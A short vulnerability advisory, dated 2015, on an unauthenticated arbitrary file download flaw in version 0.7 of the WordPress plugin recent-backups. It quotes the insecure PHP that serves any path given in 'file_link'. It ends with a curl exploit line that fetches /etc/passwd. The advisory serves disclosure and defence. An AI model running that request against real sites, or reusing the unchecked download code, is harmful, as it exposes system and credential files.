WordPress Recent Backups 0.7 File Download

`Title: Remote file download vulnerability in recent-backups v0.7 wordpress plugin  
Author: Larry W. Cashdollar, @_larry0  
Date: 2015-07-13  
Download Site: https://wordpress.org/plugins/recent-backups  
Vendor: https://profiles.wordpress.org/andycheeseman/  
Vendor Notified: 0000-00-00  
Vendor Contact: [email protected]  
Description: To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget.  
Vulnerability:  
The code in download-file.php doesn't verify the user is logged in or sanitize what files can be downloaded. This vulnerability can be used  
to download sensitive system files:  
  
2 $file = $_GET['file_link'];  
3   
4 if (file_exists($file)) {  
5 header('Content-Description: File Transfer');  
6 header('Content-Type: application/octet-stream');  
7 header('Content-Disposition: attachment; filename='.basename($file));  
8 header('Content-Transfer-Encoding: binary');  
9 header('Expires: 0');  
10 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');  
11 header('Pragma: public');  
12 header('Content-Length: ' . filesize($file));  
13 ob_clean();  
14 flush();  
15 readfile($file);  
  
CVEID:  
OSVDB:  
Exploit Code:  
• $ curl -v "http://www.example.com/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd  
`